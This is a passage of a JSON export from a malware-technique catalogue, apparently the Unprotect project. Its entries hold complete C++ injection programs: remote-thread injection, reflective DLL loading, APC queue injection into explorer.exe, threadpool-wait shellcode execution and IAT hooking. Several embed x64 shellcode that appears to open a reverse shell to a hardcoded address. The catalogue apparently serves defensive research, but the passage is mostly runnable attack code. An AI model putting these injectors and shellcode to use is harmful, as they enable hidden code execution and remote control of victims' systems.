x02\\xba\\x55\\x41\\x6b\\x3a\\xa0\\xa4\\x69\"\r\n\t\t\"\\xa4\\x1c\\x68\\xef\\x4a\\xe2\\xd8\\xd0\\x2c\\xb1\\xff\\x63\\xb2\\x26\\xd1\"\r\n\t\t\"\\xe0\\x2d\\x25\\x5e\\xd7\\x8a\\x67\\x93\\xad\\xc8\\x15\\xfb\\x9b\\xaa\\x5e\"\r\n\t\t\"\\x48\\xb9\\xa8\\x96\\xfe\\x86\\x32\\x2a\\x40\\x87\\xad\\x96\\xb2\\xea\\x3f\"\r\n\t\t\"\\xa0\\xd0\\xfd\\xa5\\x1c\\x6e\\xe3\\xf0\\x2f\\x18\\xa9\\xed\\xcd\\xff\\xfa\"\r\n\t\t\"\\x3a\\x73\\xce\\xb8\\xb6\\x5c\\xe6\\xe3\\x22\\x6a\\xca\\xa9\\x6f\\xf1\\x9e\"\r\n\t\t\"\\xe3\\x29\\xd4\\x70\\xb9\\xad\\x44\\xe4\\xea\\xf0\\x39\\x79\\xb6\\x13\\xe2\"\r\n\t\t\"\\x41\\xff\\x32\\x95\\xe7\\x92\\xde\\x42\\x8d\\x90\\x7b\\x2b\\xd1\\xb7\\xa5\"\r\n\t\t\"\\x94\\x58\\xea\\xfa\\xc7\\x30\\xe0\\xec\\x1d\\xf7\\x2b\\x9e\\x62\\x2c\\xe3\"\r\n\t\t\"\\xec\\x1c\\x05\\xa8\\x7b\\x2b\\x95\\xa0\\xb8\\x54\\x37\\x46\\x37\\xa2\\x61\"\r\n\t\t\"\\xa0\\x56\\x51\\xc9\\x84\\x7c\\xd4\\x45\\xad\\x65\\xf7\\xd6\\xa3\\x7a\\x2b\"\r\n\t\t\"\\x90\\xb8\\xad\\xa7\\x97\\x22\\x10\\x2b\\x6f\\x34\\xbc\\x4d\\xf3\\x93\\xb2\"\r\n\t\t\"\\x66\\xa1\\x21\\xa4\\xe2\\x7e\\xea\\xf2\\xe9\\xd8\\x1e\\x2c\\x55\\x37\\x63\"\r\n\t\t\"\\x3a\\x91\\x7a\\xee\\x33\\xfd\\x41\\x77\\x33\\xa2\\x57\\x8b\\xfc\\x5c\\xe6\"\r\n\t\t\"\\xee\\xf2\\xc9\\xd8\\x68\\x15\\x5c\\x04\\x3b\\xde\\x5f\\xf1\\x1e\\x39\\x55\"\r\n\t\t\"\\x3f\\x66\\x3b\\x29\\x90\\xe1\\xa5\\xa5\\xdd\\xcf\\x1f\\x2b\\x90\\xe1\\xec\"\r\n\t\t\"\\x1d\\xff\\xf2\\x3a\\x7b\\xd8\\x68\\x0e\\x4a\\xe9\\xf5\\x36\\x1a\\x50\\x8b\"\r\n\t\t\"\\xe1\\x44\\xff\\xf2\\x99\\xd7\\xf6\\x26\\xa8\\x39\\xea\\xa3\\x7a\\x63\\x1d\"\r\n\t\t\"\\xa5\\xc8\\x05\\x78\\xa2\\x13\\x63\\x19\\x07\\xba\\x4d\\xff\\xf2\\x3a\\x7b\"\r\n\t\t\"\\xd1\\xb1\\xa5\\xe2\\x7e\\xe3\\x2b\\x62\\x6f\\x29\\xa1\\x94\\x7f\\xee\\xf2\"\r\n\t\t\"\\xea\\xd1\\x5b\\x95\\xd1\\x81\\x24\\x84\\xfe\\xd8\\xd0\\x3e\\x55\\x41\\x68\"\r\n\t\t\"\\xf0\\x25\\xd1\\x5b\\xe4\\x9a\\xa3\\xc2\\x84\\xfe\\x2b\\x11\\x59\\xbf\\xe8\"\r\n\t\t\"\\xe3\\xc1\\x8d\\x05\\x5c\\x71\\xe2\\x6b\\xea\\xf8\\xef\\xb8\\xdd\\xea\\x61\"\r\n\t\t\"\\xb4\\x22\\x80\\xcb\\xe5\\xe4\\x57\\x5a\\xad\\xd0\\x14\\x41\\x90\\xb8\\xad\"\r\n\t\t\"\\x94\\x64\\x5d\\xae\\x2b\\x90\\xe1\\xec\";\r\n\r\n\tHANDLE processHandle;\r\n\tHANDLE remoteThread;\r\n\tPVOID remoteBuffer;\r\n\r\n\tprintf(\"Injecting to PID: %i\", atoi(argv[1]));\r\n\tprocessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));\r\n\tremoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\r\n\tWriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);\r\n\tremoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);\r\n\tCloseHandle(processHandle);\r\n\r\n return 0;\r\n}"
},
{
"id": 87,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/110/?format=api",
"description": "Original source: https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection",
"plain_code": "#include \"pch.h\"\r\n#include <iostream>\r\n#include <Windows.h>\r\n\r\ntypedef struct BASE_RELOCATION_BLOCK {\r\n\tDWORD PageAddress;\r\n\tDWORD BlockSize;\r\n} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;\r\n\r\ntypedef struct BASE_RELOCATION_ENTRY {\r\n\tUSHORT Offset : 12;\r\n\tUSHORT Type : 4;\r\n} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;\r\n\r\nusing DLLEntry = BOOL(WINAPI *)(HINSTANCE dll, DWORD reason, LPVOID reserved);\r\n\r\nint main()\r\n{\r\n\t// get this module's image base address\r\n\tPVOID imageBase = GetModuleHandleA(NULL);\r\n\r\n\t// load DLL into memory\r\n\tHANDLE dll = CreateFileA(\"\\\\\\\\VBOXSVR\\\\Experiments\\\\MLLoader\\\\MLLoader\\\\x64\\\\Debug\\\\dll.dll\", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);\r\n\tDWORD64 dllSize = GetFileSize(dll, NULL);\r\n\tLPVOID dllBytes = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dllSize);\r\n\tDWORD outSize = 0; \r\n\tReadFile(dll, dllBytes, dllSize, &outSize, NULL);\r\n\r\n\t// get pointers to in-memory DLL headers\r\n\tPIMAGE_DOS_HEADER dosHeaders = (PIMAGE_DOS_HEADER)dllBytes;\r\n\tPIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)dllBytes + dosHeaders->e_lfanew);\r\n\tSIZE_T dllImageSize = ntHeaders->OptionalHeader.SizeOfImage;\r\n\r\n\t// allocate new memory space for the DLL. Try to allocate memory in the image's preferred base address, but don't stress if the memory is allocated elsewhere\r\n\t//LPVOID dllBase = VirtualAlloc((LPVOID)0x000000191000000, dllImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tLPVOID dllBase = VirtualAlloc((LPVOID)ntHeaders->OptionalHeader.ImageBase, dllImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\t\t\t\r\n\t// get delta between this module's image base and the DLL that was read into memory\r\n\tDWORD_PTR deltaImageBase = (DWORD_PTR)dllBase - (DWORD_PTR)ntHeaders->OptionalHeader.ImageBase;\r\n\r\n\t// copy over DLL image headers to the newly allocated space for the DLL\r\n\tstd::memcpy(dllBase, dllBytes, ntHeaders->OptionalHeader.SizeOfHeaders);\r\n\r\n\t// copy over DLL image sections to the newly allocated space for the DLL\r\n\tPIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(ntHeaders);\r\n\tfor (size_t i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)\r\n\t{\r\n\t\tLPVOID sectionDestination = (LPVOID)((DWORD_PTR)dllBase + (DWORD_PTR)section->VirtualAddress);\r\n\t\tLPVOID sectionBytes = (LPVOID)((DWORD_PTR)dllBytes + (DWORD_PTR)section->PointerToRawData);\r\n\t\tstd::memcpy(sectionDestination, sectionBytes, section->SizeOfRawData);\r\n\t\tsection++;\r\n\t}\r\n\r\n\t// perform image base relocations\r\n\tIMAGE_DATA_DIRECTORY relocations = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\r\n\tDWORD_PTR relocationTable = relocations.VirtualAddress + (DWORD_PTR)dllBase;\r\n\tDWORD relocationsProcessed = 0;\r\n\r\n\twhile (relocationsProcessed < relocations.Size) \r\n\t{\r\n\t\tPBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)(relocationTable + relocationsProcessed);\r\n\t\trelocationsProcessed += sizeof(BASE_RELOCATION_BLOCK);\r\n\t\tDWORD relocationsCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);\r\n\t\tPBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)(relocationTable + relocationsProcessed);\r\n\r\n\t\tfor (DWORD i = 0; i < relocationsCount; i++)\r\n\t\t{\r\n\t\t\trelocationsProcessed += sizeof(BASE_RELOCATION_ENTRY);\r\n\r\n\t\t\tif (relocationEntries[i].Type == 0)\r\n\t\t\t{\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t\tDWORD_PTR relocationRVA = relocationBlock->PageAddress + relocationEntries[i].Offset;\r\n\t\t\tDWORD_PTR addressToPatch = 0;\r\n\t\t\tReadProcessMemory(GetCurrentProcess(), (LPCVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR), NULL);\r\n\t\t\taddressToPatch += deltaImageBase;\r\n\t\t\tstd::memcpy((PVOID)((DWORD_PTR)dllBase + relocationRVA), &addressToPatch, sizeof(DWORD_PTR));\r\n\t\t}\r\n\t}\r\n\t\r\n\t// resolve import address table\r\n\tPIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;\r\n\tIMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];\r\n\timportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(importsDirectory.VirtualAddress + (DWORD_PTR)dllBase);\r\n\tLPCSTR libraryName = \"\";\r\n\tHMODULE library = NULL;\r\n\r\n\twhile (importDescriptor->Name != NULL)\r\n\t{\r\n\t\tlibraryName = (LPCSTR)importDescriptor->Name + (DWORD_PTR)dllBase;\r\n\t\tlibrary = LoadLibraryA(libraryName);\r\n\t\t\r\n\t\tif (library)\r\n\t\t{\r\n\t\t\tPIMAGE_THUNK_DATA thunk = NULL;\r\n\t\t\tthunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)dllBase + importDescriptor->FirstThunk);\r\n\r\n\t\t\twhile (thunk->u1.AddressOfData != NULL)\r\n\t\t\t{\r\n\t\t\t\tif (IMAGE_SNAP_BY_ORDINAL(thunk->u1.Ordinal))\r\n\t\t\t\t{\r\n\t\t\t\t\tLPCSTR functionOrdinal = (LPCSTR)IMAGE_ORDINAL(thunk->u1.Ordinal);\r\n\t\t\t\t\tthunk->u1.Function = (DWORD_PTR)GetProcAddress(library, functionOrdinal);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tPIMAGE_IMPORT_BY_NAME functionName = (PIMAGE_IMPORT_BY_NAME)((DWORD_PTR)dllBase + thunk->u1.AddressOfData);\r\n\t\t\t\t\tDWORD_PTR functionAddress = (DWORD_PTR)GetProcAddress(library, functionName->Name);\r\n\t\t\t\t\tthunk->u1.Function = functionAddress;\r\n\t\t\t\t}\r\n\t\t\t\t++thunk;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\timportDescriptor++;\r\n\t}\r\n\r\n\t// execute the loaded DLL\r\n\tDLLEntry DllEntry = (DLLEntry)((DWORD_PTR)dllBase + ntHeaders->OptionalHeader.AddressOfEntryPoint);\r\n\t(*DllEntry)((HINSTANCE)dllBase, DLL_PROCESS_ATTACH, 0);\r\n\r\n\tCloseHandle(dll);\r\n\tHeapFree(GetProcessHeap(), 0, dllBytes);\r\n\r\n\treturn 0;\r\n}"
},
{
"id": 88,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/113/?format=api",
"description": "Original source: https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection",
"plain_code": "#include \"pch.h\"\r\n#include <iostream>\r\n#include <Windows.h>\r\n#include <TlHelp32.h>\r\n#include <vector>\r\n\r\nint main()\r\n{\r\n\tunsigned char buf[] = \"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xcc\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x66\\x81\\x78\\x18\\x0b\\x02\\x0f\\x85\\x72\\x00\\x00\\x00\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\\x8b\\x12\\xe9\\x4b\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\\x5f\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\\xa0\\x01\\x00\\x00\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x01\\xbb\\x0a\\x00\\x00\\x05\\x41\\x54\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x4c\\x89\\xea\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xba\\x29\\x80\\x6b\\x00\\xff\\xd5\\x6a\\x0a\\x41\\x5e\\x50\\x50\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48\\xff\\xc0\\x48\\x89\\xc2\\x48\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x48\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89\\xe2\\x48\\x89\\xf9\\x41\\xba\\x99\\xa5\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\x49\\xff\\xce\\x75\\xe5\\xe8\\x93\\x00\\x00\\x00\\x48\\x83\\xec\\x10\\x48\\x89\\xe2\\x4d\\x31\\xc9\\x6a\\x04\\x41\\x58\\x48\\x89\\xf9\\x41\\xba\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x55\\x48\\x83\\xc4\\x20\\x5e\\x89\\xf6\\x6a\\x40\\x41\\x59\\x68\\x00\\x10\\x00\\x00\\x41\\x58\\x48\\x89\\xf2\\x48\\x31\\xc9\\x41\\xba\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x48\\x89\\xc3\\x49\\x89\\xc7\\x4d\\x31\\xc9\\x49\\x89\\xf0\\x48\\x89\\xda\\x48\\x89\\xf9\\x41\\xba\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x28\\x58\\x41\\x57\\x59\\x68\\x00\\x40\\x00\\x00\\x41\\x58\\x6a\\x00\\x5a\\x41\\xba\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\\x59\\x41\\xba\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x49\\xff\\xce\\xe9\\x3c\\xff\\xff\\xff\\x48\\x01\\xc3\\x48\\x29\\xc6\\x48\\x85\\xf6\\x75\\xb4\\x41\\xff\\xe7\\x58\\x6a\\x00\\x59\\x49\\xc7\\xc2\\xf0\\xb5\\xa2\\x56\\xff\\xd5\";\r\n\r\n\tHANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);\r\n\tHANDLE victimProcess = NULL;\r\n\tPROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) };\r\n\tTHREADENTRY32 threadEntry = { sizeof(THREADENTRY32) };\r\n\tstd::vector<DWORD> threadIds;\r\n\tSIZE_T shellSize = sizeof(buf);\r\n\tHANDLE threadHandle = NULL;\r\n\r\n\tif (Process32First(snapshot, &processEntry)) {\r\n\t\twhile (_wcsicmp(processEntry.szExeFile, L\"explorer.exe\") != 0) {\r\n\t\t\tProcess32Next(snapshot, &processEntry);\r\n\t\t}\r\n\t}\r\n\t\r\n\tvictimProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, processEntry.th32ProcessID);\r\n\tLPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tPTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;\r\n\tWriteProcessMemory(victimProcess, shellAddress, buf, shellSize, NULL);\r\n\r\n\tif (Thread32First(snapshot, &threadEntry)) {\r\n\t\tdo {\r\n\t\t\tif (threadEntry.th32OwnerProcessID == processEntry.th32ProcessID) {\r\n\t\t\t\tthreadIds.push_back(threadEntry.th32ThreadID);\r\n\t\t\t}\r\n\t\t} while (Thread32Next(snapshot, &threadEntry));\r\n\t}\r\n\t\r\n\tfor (DWORD threadId : threadIds) {\r\n\t\tthreadHandle = OpenThread(THREAD_ALL_ACCESS, TRUE, threadId);\r\n\t\tQueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);\r\n\t\tSleep(1000 * 2);\r\n\t}\r\n\t\r\n\treturn 0;\r\n}"
},
{
"id": 89,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/181/?format=api",
"description": "Original source code: https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait\r\n\r\nThe first thing the code does is allocate read-write-execute (RWX) memory for the shellcode using the `VirtualAlloc` function. This memory will be used to store the shellcode and execute it. Next, the code uses the `CreateThreadpoolWait` function to create a wait object and specify the address of the shellcode as the callback function. The code then uses the `SetThreadpoolWait` function to set the wait object created in the previous step. Finally, the code uses the `WaitForSingleObject` function to wait for the wait object to become signaled. When the wait object is signaled, the callback function (which contains the shellcode) is executed.",
"plain_code": "#include <windows.h>\r\n#include <threadpoolapiset.h>\r\n\r\nunsigned char shellcode[] = \r\n\"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\"\r\n\"\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\"\r\n\"\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\"\r\n\"\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\"\r\n\"\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\"\r\n\"\\x01\\xd0\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\"\r\n\"\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\"\r\n\"\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\"\r\n\"\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\"\r\n\"\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\"\r\n\"\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\"\r\n\"\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\"\r\n\"\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\r\n\"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\\x5f\\x33\"\r\n\"\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\\xa0\\x01\\x00\\x00\"\r\n\"\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x01\\xbb\\xc0\\xa8\\x38\\x66\\x41\\x54\"\r\n\"\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x4c\"\r\n\"\\x89\\xea\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xba\\x29\\x80\\x6b\\x00\\xff\"\r\n\"\\xd5\\x50\\x50\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48\\xff\\xc0\\x48\\x89\\xc2\"\r\n\"\\x48\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x48\"\r\n\"\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89\\xe2\\x48\\x89\\xf9\\x41\\xba\\x99\"\r\n\"\\xa5\\x74\\x61\\xff\\xd5\\x48\\x81\\xc4\\x40\\x02\\x00\\x00\\x49\\xb8\\x63\"\r\n\"\\x6d\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\\x41\\x50\\x48\\x89\\xe2\\x57\"\r\n\"\\x57\\x57\\x4d\\x31\\xc0\\x6a\\x0d\\x59\\x41\\x50\\xe2\\xfc\\x66\\xc7\\x44\"\r\n\"\\x24\\x54\\x01\\x01\\x48\\x8d\\x44\\x24\\x18\\xc6\\x00\\x68\\x48\\x89\\xe6\"\r\n\"\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xff\\xc0\\x41\\x50\\x49\\xff\"\r\n\"\\xc8\\x4d\\x89\\xc1\\x4c\\x89\\xc1\\x41\\xba\\x79\\xcc\\x3f\\x86\\xff\\xd5\"\r\n\"\\x48\\x31\\xd2\\x48\\xff\\xca\\x8b\\x0e\\x41\\xba\\x08\\x87\\x1d\\x60\\xff\"\r\n\"\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\\xba\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x48\"\r\n\"\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\"\r\n\"\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\\xd5\";\r\n\r\n\r\nint main()\r\n{\r\n\tHANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);\r\n\tLPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tRtlMoveMemory(shellcodeAddress, shellcode, sizeof(shellcode));\r\n\r\n\tPTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);\r\n\tSetThreadpoolWait(threadPoolWait, event, NULL);\r\n\tWaitForSingleObject(event, INFINITE);\r\n\t\r\n\treturn 0;\r\n}"
},
{
"id": 90,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/117/?format=api",
"description": "Original source code: https://www.ired.team/offensive-security/code-injection-process-injection/import-adress-table-iat-hooking",
"plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n#include <winternl.h>\r\n\r\n// define MessageBoxA prototype\r\nusing PrototypeMessageBox = int (WINAPI *)(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType);\r\n\r\n// remember memory address of the original MessageBoxA routine\r\nPrototypeMessageBox originalMsgBox = MessageBoxA;\r\n\r\n// hooked function with malicious code that eventually calls the original MessageBoxA\r\nint hookedMessageBox(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)\r\n{\r\n\tMessageBoxW(NULL, L\"Ola Hooked from a Rogue Senor .o.\", L\"Ola Senor o/\", 0);\r\n\t// execute the original NessageBoxA\r\n\treturn originalMsgBox(hWnd, lpText, lpCaption, uType);\r\n}\r\n\r\nint main()\r\n{\r\n\t// message box before IAT unhooking\r\n\tMessageBoxA(NULL, \"Hello Before Hooking\", \"Hello Before Hooking\", 0);\r\n\t\r\n\tLPVOID imageBase = GetModuleHandleA(NULL);\r\n\tPIMAGE_DOS_HEADER dosHeaders = (PIMAGE_DOS_HEADER)imageBase;\r\n\tPIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)imageBase + dosHeaders->e_lfanew);\r\n\r\n\tPIMAGE_IMPORT_DESCRIPTOR importDescriptor = NULL;\r\n\tIMAGE_DATA_DIRECTORY importsDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];\r\n\timportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(importsDirectory.VirtualAddress + (DWORD_PTR)imageBase);\r\n\tLPCSTR libraryName = NULL;\r\n\tHMODULE library = NULL;\r\n\tPIMAGE_IMPORT_BY_NAME functionName = NULL; \r\n\r\n\twhile (importDescriptor->Name != NULL)\r\n\t{\r\n\t\tlibraryName = (LPCSTR)importDescriptor->Name + (DWORD_PTR)imageBase;\r\n\t\tlibrary = LoadLibraryA(libraryName);\r\n\r\n\t\tif (library)\r\n\t\t{\r\n\t\t\tPIMAGE_THUNK_DATA originalFirstThunk = NULL, firstThunk = NULL;\r\n\t\t\toriginalFirstThunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + importDescriptor->OriginalFirstThunk);\r\n\t\t\tfirstThunk = (PIMAGE_THUNK_DATA)((DWORD_PTR)imageBase + importDescriptor->FirstThunk);\r\n\r\n\t\t\twhile (originalFirstThunk->u1.AddressOfData != NULL)\r\n\t\t\t{\r\n\t\t\t\tfunctionName = (PIMAGE_IMPORT_BY_NAME)((DWORD_PTR)imageBase + originalFirstThunk->u1.AddressOfData);\r\n\t\t\t\t\t\r\n\t\t\t\t// find MessageBoxA address\r\n\t\t\t\tif (std::string(functionName->Name).compare(\"MessageBoxA\") == 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tSIZE_T bytesWritten = 0;\r\n\t\t\t\t\tDWORD oldProtect = 0;\r\n\t\t\t\t\tVirtualProtect((LPVOID)(&firstThunk->u1.Function), 8, PAGE_READWRITE, &oldProtect);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t// swap MessageBoxA address with address of hookedMessageBox\r\n\t\t\t\t\tfirstThunk->u1.Function = (DWORD_PTR)hookedMessageBox;\r\n\t\t\t\t}\r\n\t\t\t\t++originalFirstThunk;\r\n\t\t\t\t++firstThunk;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\timportDescriptor++;\r\n\t}\r\n\r\n\t// message box after IAT hooking\r\n\tMessageBoxA(NULL, \"Hello after Hooking\", \"Hello after Hooking\", 0);\r\n\t\r\n\treturn 0;\r\n}"
},
{
"id": 91,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/75/?format=api",
"description": "Original source code: https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware",
